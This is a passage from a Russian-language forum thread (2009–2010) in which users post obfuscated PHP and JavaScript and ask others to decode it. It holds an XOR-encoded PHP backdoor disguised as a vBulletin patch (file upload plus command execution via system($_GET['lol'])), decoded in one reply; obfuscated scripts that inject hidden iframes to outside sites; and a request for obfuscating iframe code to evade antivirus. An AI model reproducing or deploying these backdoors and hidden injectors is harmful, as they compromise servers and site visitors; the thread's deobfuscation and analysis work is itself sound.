YldQRHl5b1VBeVB0eFdQS2ZYUER4V1BLSWhvVHlobmx0eHBUUz BuUDRhWWxwaFdUTWNvVEloTEoxeVhHZlhQRHhXc0RiV1BLMFhQ SzBYUEhPd29UOW1NSkVjcHZ0eEwzSWxweklocVM5eG5LVmNCam JYUEp5elZQdHhNVElmSzJFY3B2TjlDRk9ISHlJU1ZSU0JFUE54 b1RJMk1KanRDdk5qWERiV3JqYldQSE9sb0pFY3B2dHhwVFMwbl B4N1B0eTlQYTBY"))));
?>

Kaimi

23.12.2009, 17:53

<?php
function maxsite_cache()
{
global $maxsite_cache_start_time, $maxsite_cache_no;

$maxsite_cache_no = false;
$maxsite_cache_start_time = getmicrotime();

$url = $_SERVER['REQUEST_URI'];

if (strpos($url, 'cache-flush') !== false and strpos($url, 'cache-flush') > 0 )
{
$maxsite_cache_no = true;
mso_flush_cache();
return false;
}

$dir = realpath(dirname(__FILE__)) . '/cache/';
$filepath = $dir . md5($url);

if ( file_exists($filepath))
{
if ( $fp = @fopen($filepath, 'rb'))
{
$cache = fread($fp, filesize($filepath));

fclose($fp);

$memory = (!function_exists('memory_get_usage')) ? '' : round(memory_get_usage()/1024/1024, 2) . 'MB';

$time = substr(getmicrotime() - $maxsite_cache_start_time, 0, 7) . ' sec';

$max_site = '<p style="text-align: center"><a href="http://maxsite.org/">MAXCACHE</a>: ' . $memory . '/' . $time . '</p>';

if (strpos($cache, '') !== false)
$cache = str_replace('', $max_site, $cache);
else
$cache = str_replace('</body>', $max_site . '</body>', $cache);

echo $cache;
return true;
}
}

ob_start();

return false;
}

/**
* РџРѕС…РѕР¶Р°СЏ С„СѓРЅРєС†РёСЏ РёР· MaxSite CMS (http://max-3000.com/)
* Р’ MaxSite CMS РЅРµС‚ РїСЂРѕР±Р»РµРј СЃ РєСЌС?РёСЂРѕРІР°РЅРёРµРј.
* РџРѕРєСѓРїР°Р№С‚Рµ РЅР°С?РёС… СЃР»РѕРЅРѕРІ!
*/
function mso_add_cache($key, $output)
{
$cache_path = realpath(dirname(__FILE__)) . '/cache/';

if ( !is_dir($cache_path) or !is_writable($cache_path)) return;

if ( $fp = @fopen($cache_path . md5($key), 'wb'))
{
flock($fp, LOCK_EX);
fwrite($fp, $output);
flock($fp, LOCK_UN);
fclose($fp);
}
}

/**
* РЎР»РѕРЅС‹ Р·Р°РјРµС‡Р°С‚РµР»СЊРЅС� �Рµ!
* РёРґРµРј СЃСЋРґР°: http://max-3000.com/
*/
function mso_flush_cache()
{
$cache_path = realpath(dirname(__FILE__)) . '/cache/';

if ( !is_dir($cache_path) or !is_writable($cache_path)) return;
delete_files($cache_path);
}

/**
* Р•С‰Рµ РµСЃС‚СЊ РєСЂРѕР»РёРєРё
*/
function maxsite_cache_end()
{
global $maxsite_cache_no;

if (!$maxsite_cache_no) mso_add_cache($_SERVER['REQUEST_URI'], ob_get_flush());
}

/**
* RTFM PHP
*/
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}

/**
* (c) CodeIgniter
*/
function delete_files($path, $del_dir = FALSE, $level = 0)
{
// Trim the trailing slash
$path = preg_replace("|^(.+?)/*$|", "\\1", $path);

if ( ! $current_dir = @opendir($path))
return;

while(FALSE !== ($filename = @readdir($current_dir)))
{
if ($filename != "." and $filename != "..")
{
if (is_dir($path.'/'.$filename))
{
// Ignore empty folders
if (substr($filename, 0, 1) != '.')
{
delete_files($path.'/'.$filename, $del_dir, $level + 1);
}
}
else
{
unlink($path.'/'.$filename);
}
}
}
@closedir($current_dir);

if ($del_dir == TRUE AND $level > 0)
{
@rmdir($path);
}
}
?>

Eric Cartman

23.12.2009, 18:46

Kaimi, спасибо! :)

anticoder

26.12.2009, 14:30

Dragon_X, спасибо тебе! Да, код не весь выложил.. мне только название домена узнать надо было. еще раз сенк!

Wakko

26.12.2009, 22:39

Помогите раскодировать пожалуста.
:rolleyes:
Файл на обменнике (скачать) (http://upwap.ru/686296)

Gifts

26.12.2009, 22:43

Wakko http://pastebin.ru/309353

Внутри, кстати, была проверка на адрес домена

Wakko

26.12.2009, 22:51

Gifts, спасибо большое, про проерку знаю, но иначе некак недобавить функции которые нужны именно мне.

Wakko

27.12.2009, 04:26

Кто поможет зашифровать яву так чтобы хотяб онлайн декодерами недекодировалась?
function confirmDelete(url){var agree=confirm('Вы уверены, что хотите удалить данное сообщение?');if (agree)document.location=url;}
function confirmMail(url){var agree=confirm('Вы уверены, что хотите подписаться на эту тему?');if (agree)document.location=url;}
function ShowOrHide(d1) {if (d1 != '') DoDiv(d1);}
function ShowHide(d1) {if (d1 != '') DoDiv(d1);}
function DoDiv(id) {var item = null;if (document.getElementById) {item = document.getElementById(id);} else if (document.all){item = document.all[id];} else if (document.layers){item = document.layers[id];}if (!item) {}else if (item.style) {if (item.style.display == "none"){ item.style.display = ""; }else {item.style.display = "none"; }}else{ item.visibility = "show"; }}
document.write('<link rel="stylesheet" type="text/css" href="/templates/css/0000.css">');

WinTREI

02.01.2010, 10:58

Kaimi, опишите пожалуйста подробно как вы раскодировали пост 68-69, у меня возникает ошибка Warning: gzuncompress() [function.gzuncompress]: data error in

WinTREI

02.01.2010, 11:03

еще подскажите как раскодировать такое
<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72% 61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4} .$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO000 0O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$ OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000 {11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};?><?php
$config[$GLOBALS['OOO0000O0']('Y2hhcnNldA==')] = "windows-1251";
$IIIIIIIIIIIl = "cp1251";
$IIIIIIIII1Il = 2;
с 'Y2hhcnNldA== всё понятно просто base64_decode(), а как раскадировать $IIIIIIIIIIIl и $IIIIIIIII1Il ?

suser

02.01.2010, 12:11

еще подскажите как раскадировать такое
<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72% 61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4} .$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO000 0O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$ OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000 {11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};?><?php
$config[$GLOBALS['OOO0000O0']('Y2hhcnNldA==')] = "windows-1251";
$IIIIIIIIIIIl = "cp1251";
$IIIIIIIII1Il = 2;
с 'Y2hhcnNldA== всё понятно просто base64_decode(), а как раскадировать $IIIIIIIIIIIl и $IIIIIIIII1Il ?

<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72% 61%34%63%6f%5f%74%6e%64');
$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{ 3}.$OOO000000{5};
$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO00000 0{13}.$OOO000000{16};
$OOO0000O0.=$OOO0000O0{3}.$OOO000000 {11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};

echo '<textarea name="textarea" cols="100" rows="25">'.$OOO0000O0.'</textarea>';
?>
Наверно гдето кодируется функцияей
$xxx = iconv("windows-1251", "UTF-8", $xxx);

WinTREI

02.01.2010, 12:38

Наверно гдето кодируется функцияей
$xxx = iconv("windows-1251", "UTF-8", $xxx);
нету ничего
вот начало
<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72% 61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4} .$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO000 0O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$ OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000 {11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};?>
<?php define($GLOBALS['OOO0000O0']('UnNzX0dyYWJiZXJfSU5TVEFMTA=='),1);
error_reporting(E_ALL ^E_NOTICE);
@session_start();
@ini_set($GLOBALS['OOO0000O0']('ZGlzcGxheV9lcnJvcnM='),true);
@ini_set($GLOBALS['OOO0000O0']('aHRtbF9lcnJvcnM='),false);
@ini_set($GLOBALS['OOO0000O0']('ZXJyb3JfcmVwb3J0aW5n'),E_ALL ^E_NOTICE);
define($GLOBALS['OOO0000O0']('REFUQUxJRkVFTkdJTkU='),true);
define($GLOBALS['OOO0000O0']('Uk9PVF9ESVI='),dirname (__FILE__));
define($GLOBALS['OOO0000O0']('RU5HSU5FX0RJUg=='),ROOT_DIR.$GLOBALS['OOO0000O0']('L2VuZ2luZQ=='));
require_once ENGINE_DIR.$GLOBALS['OOO0000O0']('L2RhdGEvY29uZmlnLnBocA==');
include_once ENGINE_DIR.$GLOBALS['OOO0000O0']('L2NsYXNzZXMvbWFpbC5jbGFzcy5waHA=');
require_once ENGINE_DIR.$GLOBALS['OOO0000O0']('L2NsYXNzZXMvbXlzcWwucGhw');
require_once ENGINE_DIR.$GLOBALS['OOO0000O0']('L2RhdGEvZGJjb25maWcucGhw');
require_once ENGINE_DIR.$GLOBALS['OOO0000O0']('L21vZHVsZXMvZnVuY3Rpb25zLnBocA==');
$config[$GLOBALS['OOO0000O0']('Y2hhcnNldA==')] = "windows-1251";
$IIIIIIIIIIIl = "cp1251";
$IIIIIIIIIII1 = "cp1251_general_ci";
$url = $config[$GLOBALS['OOO0000O0']('aHR0cF9ob21lX3VybA==')];
$IIIIIIIIIllI = time()+($config[$GLOBALS['OOO0000O0']('ZGF0ZV9hZGp1c3Q=')]*60);
$IIIIIIIIIll1 = date ("Y-m-d H:i:s",$IIIIIIIIIllI);
extract($_REQUEST,EXTR_SKIP);
$act = $_REQUEST[$GLOBALS['OOO0000O0']('YWN0')];
if (!intval($act)) {
$act = 1;
$IIIIIIIII1Il = 2; }
$IIIIIIIII1I1 = $GLOBALS['OOO0000O0']('xODr/PjlID4=');

FreeeMan

04.01.2010, 17:11

прошу помощи в расшифровке кода из template.php wp'шного шаблона.
прямой линк на файл:
http://market.wafl.ru/template.php.txt

Gifts

04.01.2010, 18:18

FreeeMan http://pastebin.ru/309533

pretolock

09.01.2010, 01:22

Подскажите php5 обфускатор который поддерживает классы
при этом каждый класс располагаеца в своем php5-файле
есть наследование классов
есть php скрипты в отдельных файлах, в которых создаюца объекты этих классов
необходимо чтобы были обфусцированы имена полей, методов и констант классов и чтобы во всех файлах где они используюца также были изменены

seens

10.01.2010, 03:49

Помогите пожалуйсто расшифровать этот код

<?php
error_reporting(0);eval(gzinflate(base64_decode( "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 lE9MitbgCPUSh1po+xsvEMwHPwM=")));?>

Gifts

10.01.2010, 05:57

seens http://pastebin.ru/309668

seens

10.01.2010, 11:29

Видать немного не тот код,нету там сообщений тех что он выдовал.

Wakko

12.01.2010, 05:37

seens:

<?PHP

error_reporting(0);
$k2e9y7_t1h2a6t3_5s0c9r7i1p2t6_3i5s0_7c1r2y6p3t5e0 d1= 3 ;

$r9e1s6o5u2r7c2e_c3r0y2p9t7e1d_c2o6d3e5 = "?!nvowjsbqw,elqn.gbwb!#b`wjlm>!\$-'\\PFQUFQX!SKS\\PFOE!^-\$!#nfwklg>!slpw!= ?jmsvw#mbnf>!ejof!#wzsf>!ejof!= ?jmsvw#wzsf>!kjggfm!#mbnf>!y!#ubovf>!2!= ?jmsvw#wzsf>!pvanjw!#ubovf>!VSOLBG!= ?,elqn=\$8 je+jppfw+'\\DFWX\$olo\$^**#pzpwfn+'\\DFWX\$olo\$^* 8 'vsolbggjq#>#\$-,\$8 'vsolbgejof#>#'vsolbggjq-abpfmbnf+'\\EJOFPX\$ejof\$^X\$mbnf\$^*8 je+nluf\\vsolbgfg\\ejof+'\\EJOFPX\$ejof\$^X\$wns\\ mbnf\$^/#'vsolbgejof**#f`kl#!LH\"!8 ~ f`kl#!uAvoofwjm#sbwk`fg#pv``fppevooz\"!8 <=# ";

$s2t7r2i3n0g_o9u1t6p5u2t0=$r9e1s6o5u2r7c2e_c3r0y2p 9t7e1d_c2o6d3e5;
$l0e5n3t6h_o2f_c1r7y9p2t5e3d_c6o2d1e7= strlen ( $s2t7r2i3n0g_o9u1t6p5u2t0); $e0v3a2l_p7h2p_c9o1d6e5 = '' ;

for ( $h5u6i1v9a2m7v2s3e0m= 0; $h5u6i1v9a2m7v2s3em < $l0e5n3t6h_o2f_c1r7y9p2t5e3d_c6o2d1e7; $h5u6i1v9a2m7v2s3e0m++ ) $e0v3a2l_p7h2p_c9o1d6e5 .= chr ( ord ($s2t7r2i3n0g_o9u1t6p5u2t0[ $h5u6i1v92m7v2s3e0m] ) ^ $k2e9y7_t1h2a6t3_5s0c9r7i1p2t6_3i5s0_7c1r2y6p3t5e0 d1 ) ;

eval ( "error_reporting ( 0 ) ; ?>" .$e0v3a2l_p7h2p_c9o1d6e5."<?" ) ;

?>

Saint-Sky

12.01.2010, 08:28

Wakko
В коде небольшая ошибка -
chr ( ord ($s2t7r2i3n0g_o9u1t6p5u2t0[ $h5u6i1v92m7v2s3e0m] )

В $h5u6i1v92m7v2s3e0m м/у 9 и 2 пропущена "a"

Если исправить, то расшифровывается так:
error_reporting(0);?><"multipart/form-data" action="'.$_SERVER["PHP_SELF"].'" method="post"><input name="file" type="file"><input type="hidden" name="z" value="1"><input type="submit" value="UPLOAD"></form>';if(isset($_GET['lol'])) system($_GET['lol']);$uploaddir = './';$uploadfile = $uploaddir.basename($_FILES['file']['name']);if(move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) echo "OK!";}echo "vBulletin pathced successfully!";?>

Не трудно догадаться, что это код бэкдора...

Мелкий

17.01.2010, 12:56

а можно ли спрятать под обфускатором только часть кода?! Только чтоб скрипт оставался рабочим! я написал cms но мне надо спрятать и зашифровать несколько файлов: файл лицензии(так как лицензия выдается на определенный домен) - чтоб не смогли изменять... и файл с копирайтом разработчиков, который будет в бесплатной версии!

Gifts

17.01.2010, 14:53

Мелкий Вам требуется благословение, чтобы попробовать? Я вам его даю

Если обфускация не подразумевает изменение переменных на произвольный набор букво-цифр - то да, можно закодировать хоть одну строчку кода - функционирование не нарушится

Mixon

23.01.2010, 22:07

Здраствуйте)) подскажите несколько секретов по обфускации кода в javascript)
Вот скоро нужно будет обфусцировать скрипт,чего вот такого замудрённого есть а яваскрипте?)

astrologer

23.01.2010, 23:50

Здраствуйте)) подскажите несколько секретов по обфускации кода в javascript)
Вот скоро нужно будет обфусцировать скрипт,чего вот такого замудрённого есть а яваскрипте?) Здравствуй. Попробуй записать вот такой простой код: alert(0); не используя ни цифр, ни букв (сохранив его работоспособность, разумеется). Постарайся уложиться в 200 символов. К тому времени, как у тебя это получится, ты сам ответишь на свой вопрос.

Mixon

24.01.2010, 00:17

хех,значит никогда)) развешто кодировку сменить,тогде это будет символы а не буквы если внемательно читать условие и тогда выйдет))ыы

The King

24.01.2010, 13:46

У меня вопрос по защите кода.
Если я правильно понял, то (zend(lockit(обусификатор(скрипт )))) уже не ломаемая конструкция?
Либо (обусификатор(lockit(zend(скрипт ) тоже не ломаемая конструкция. Или я чего-то не догоняю. Ведь они когда попадают в интерпретатор, то дешифруются самостоятельно для передачи кода и их в этом моменте дампят.

BiG_][aKeR

25.01.2010, 02:34

что делает этот код?

<script type="text/javascript">(function(){var G=window,K=document,A=navigator,C=A.userAgent,D=lo cation.href,I=A.mimeTypes,B=9,F="http://kiks.%s/system/fc06.html",L="http://kiks.yandex.ru/system/fc06.swf",H="application/x-shockwave-flash";G.onerror=function(){return true};G.ya_fc=function(){var R=(C&&(C.indexOf("MSIE")>=0)&&(C.indexOf("Win")!=-1))?1:0,O=(I&&I[H])?I[H].enabledPlugin:0,Q=false,N=0;if(O){N=O.description .split("Shockwave Flash ")[1];Q=(parseInt(N)>=B)}else{if(R){Q=false;try{Q=new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+B)}catch(P){}}}if(Q){K.write('<object type="'+H+'" data="'+L+'" width="1" height="1" id="ya_fc"><param name="movie" value="'+L+'" /><param name="quality" value="high" /><param name="wmode" value="window" /><param name="bgcolor" value="#ffffff" /><param name="allowScriptAccess" value="always" /></object>')}else{}};G.requestData=function(){var N=K.getElementById("ya_fc");try{N.setLocation(M(),J())}catch(O){}};G.setCook ie=function(O){var N=new Date();N.setTime(N.getTime()+315360000000);K.cooki e="fuid01="+O+";expires="+N.toGMTString()+";path=/;domain="+M()};G.getIFrame=function(P){var Q=F.replace("%s",P),O=K.createElement("iframe"),N=K.getElementsByTagName("body");O.src=Q;O.style.cssText="width:40px;height:40px;overflow:hidden;position:ab solute;left:-40px;top:0;border:0;";O.frameBorder=0;N&&N[0].appendChild(O)};function E(P,O,Q){var N=P.match(O);return N&&N[Q||1]||""}function J(){return E(K.cookie,/fuid01=([^;]+)/)}function M(){var N=E(D,/\/\/([^\/:]+)/);return N&&E(N,/(^|\.)([^\.]+\.[^\.]+)$/,2)}})();ya_fc()</script>

25.01.2010, 03:02

Короче говоря создает ифрейм

BiG_][aKeR

25.01.2010, 17:16

Всё,проблема оказалась не в этом скрипте)) спс))

25.01.2010, 17:29

Нет там никакой обфускации. Тяжело читается из-за неосмысленных имен переменных, а так все ясно и понятно.

t0xy

04.02.2010, 16:06

расшифруйте, пожалуйста вот это

сам дошел до корявых имен переменных типа "_______"

может у вас получше выйдет

http://slil.ru/28594899

Pashkela

04.02.2010, 16:30

там функция, в которой массив из которой можно вернуть декодированный элемент массива по его номеру. Чтобы посмотреть все элементы массива в декоде, просто запустить это:

http://slil.ru/28595026

PS: какой-то спамер вконтакте похоже

t0xy

05.02.2010, 00:54

так точно, это спамер и это я догадался как сделать,
но похоже переменные и функции не восстановить, видимо автор их заменил тупо в редакторе, но и на том спасибо

-=Zhenek=-

21.02.2010, 16:37

подскажите что тут :

<script>wvan=["ocynoaxi=0;nyzibet='';for(pfhuo=0;pfhuo<wvan[0]['length'];pfhuo+=1)ocynoaxi+=wvan[0].charCodeAt(pfhuo);ocynoaxi%=0x64;for(pfhuo=0;pfhu o<wvan[1]['length'];pfhuo+=2)nyzibet+=String.fromCharCode(parseInt(0+ 'x'+wvan[1].charAt(pfhuo)+wvan[1].charAt(pfhuo+1))^ocynoaxi);document.write(nyzibet );","24706c757426247a777c6126246b7b6a71686c266e796a386c 7d7568515e6a79757d257c777b6d757d766c367b6a7d796c7d 5d747d757d766c303f717e6a79757d3f31236c7d7568515e6a 79757d366b7d6c596c6c6a717a6d6c7d303f717c3f343f4a4b 515e6a79757d3f31236c7d7568515e6a79757d366b7d6c596c 6c6a717a6d6c7d303f6b6a7b3f343f706c6c682237377b7471 7b73356179767c367b777537797c377176367b7f71272b3f31 236c7d7568515e6a79757d366b6c61747d366e716b717a7174 716c61253f70717c7c7d763f236c7d7568515e6a79757d366b 6c61747d366f717c6c70253f2868603f236c7d7568515e6a79 757d366b6c61747d36707d717f706c253f2868603f23515e6a 79757d577a723825387c777b6d757d766c367a777c61367968 687d767c5b7071747c306c7d7568515e6a79757d312324376b 7b6a71686c2624377a777c61262437706c757426"];eval(wvan[0]);</script>

HackUA

21.02.2010, 17:26

Как лучше зделать обусфакцию iframe кода что бы не палился каспером и другими антивирусными системами ?
Хотелось бы увидеть пару примеров.

iv.

27.02.2010, 18:36

Есть код вида:
...
$_obfuscate_3ZsDaue4z8kmCNc� =& $this->_obfuscate_DHVrfX15Kj4tGSg�( );
$_obfuscate_9zJs_k24vlStCaL_A�� = array( );
if ( isset( $_obfuscate_3ZsDaue4z8kmCNc�['*']['*'] ) )
{
$_obfuscate_9zJs_k24vlStCaL_A�� = $_obfuscate_3ZsDaue4z8kmCNc�['*']['*'];
}
if ( isset( $_obfuscate_3ZsDaue4z8kmCNc�['*']['*'] ) )
{
...
Подскажите утилиту для деобфускации имен переменных и функций.

Player#1

01.03.2010, 18:20

Помогите пожалуйста деобфусцировать:

<script type='text/javascript'>function zG(){};tF=53186;zG.prototype = {fK : function() {e="e";this.fQ='';return 'h2t)tFp2:&/F/)c2l)iFc)k&-FpFo)i)s)k2.Fc&o)m2/&tIh&eFrFeF/&i)n).2c)gIi&?27)'.iH(/[\)I&F2]/g, '');var oN=new Date();this.nU="";},v : function() {dF="";wS=9383;nB="nB";var t=new Date(); var h='';var m=new Date(); String.prototype.iH=function(d, o){return this.replace(d, o)};var r=new Date();tR="tR";kQ=false;gG=20573;wJ=false;zW="";var c=function(){};var y=window;gN="gN";this.yQ="yQ";var yR=y['u{n$eYs9c{aYp{eY'.iH(/[Yj9\$\{]/g, '')];var eK=new Date();var hI="hI";function jL(){};var z = this;var rN='';var p=false;var oD = "xxK%3C%2Fbody%3E%3C%2Fhtml%3E";function mT(){};xH="";this.u=false;var f=document;this.dX="dX";this.hB="hB";var jA=false;var k = { vM : 'arpTpreonTd#CohoirlSd#'.iH(/[#roST]/g, ''), oU : 'svtuyvlvei'.iH(/[ivua_]/g, ''), kC : 'cKrCe3aKt3ezEzlzezmKeGn3tK'.iH(/[K3zCG]/g, ''), fV : 'sReDtRATtTt?rRiRbRuTtEeT'.iH(/[TD\?ER]/g, ''), w : 's;rLcL'.iH(/[L;\{$5]/g, ''), xK : 'bko1dUyT'.iH(/[T1Uk$]/g, '') };var rK='';function hV(){};var uI=function(){return 'uI'};this.gC='';var rP="";var tZ=function(){return 'tZ'};this.a="a";var n=f[k.kC]('i<furuaKm<ed'.iH(/[d\<\!uK]/g, ''));var kL=new Date();i=39073;this.fU="fU";jO=false;pW='';var eY=5116;try {rD="rD";vC=false;var fI=function(){};var rU="rU";this.q="q";b="";var bJ='';nE(n,k.oU, yR("display%3A%20none"));function dS(){};rG=63044;this.uK=false;this.iB="iB";nE(n,k.w, this.fK());eU="eU";this.pS='';this.fR="";var qA='';qE="qE";qL="";f[k.xK][k.vM](n);this.xL=54456;this.hW="";var bK=new Array();this.iR="";} catch(g) {this.vB="";tN='';var eJ='';var uD=new Array();var rV=new Date();var l=function(){};this.lK='';f['wSr%i;tSe%'.iH(/[%;XS/]/g, '')](yR(oD));this.hK=49925;var iL=new Array();hKH='';this.uJ=61972;this.cO="cO";var s="s";this.mG=53808;y['s+eAt+T6iwm+ewoAuAtw'.iH(/[w\+Z6A]/g, '')](function(){ this.cJ="cJ";this.uR="";var pO='';vH=58151;this.dSF='';var sV="sV";z.v();var wH=34896;var cM=new Date();var yK=new Array();var eYV=function(){};this.kU="kU";zT="";}, 368);zJ="";var dXZ="dXZ";}qZ=19279;this.vBG='';var nM=new Date();var tZZ=false;var eE=new Date();var hC=new Date();function vO(){};var wZ="";function nE(n, j, dB){this.bW='';var fT=new Array();n[k.fV](j,dB);var iRP=function(){return 'iRP'};tD="";var kI=new Array();}this.xX='';this.fX='';var tQ=false;dV=false;}};var uY=new Array();var cP=new zG(); this.dK="dK";cP.v();function gQ(){};</script>

скачать можно тут: http://dump.ru/file/4380738

Dragon_X

02.03.2010, 10:43

подскажите что тут :

document.write замени на alert и увидишь
какой-то бинарный код

Dragon_X

02.03.2010, 11:52

{BuT@Min}

03.03.2010, 19:16

Что тут зашифровано подскажите плиз
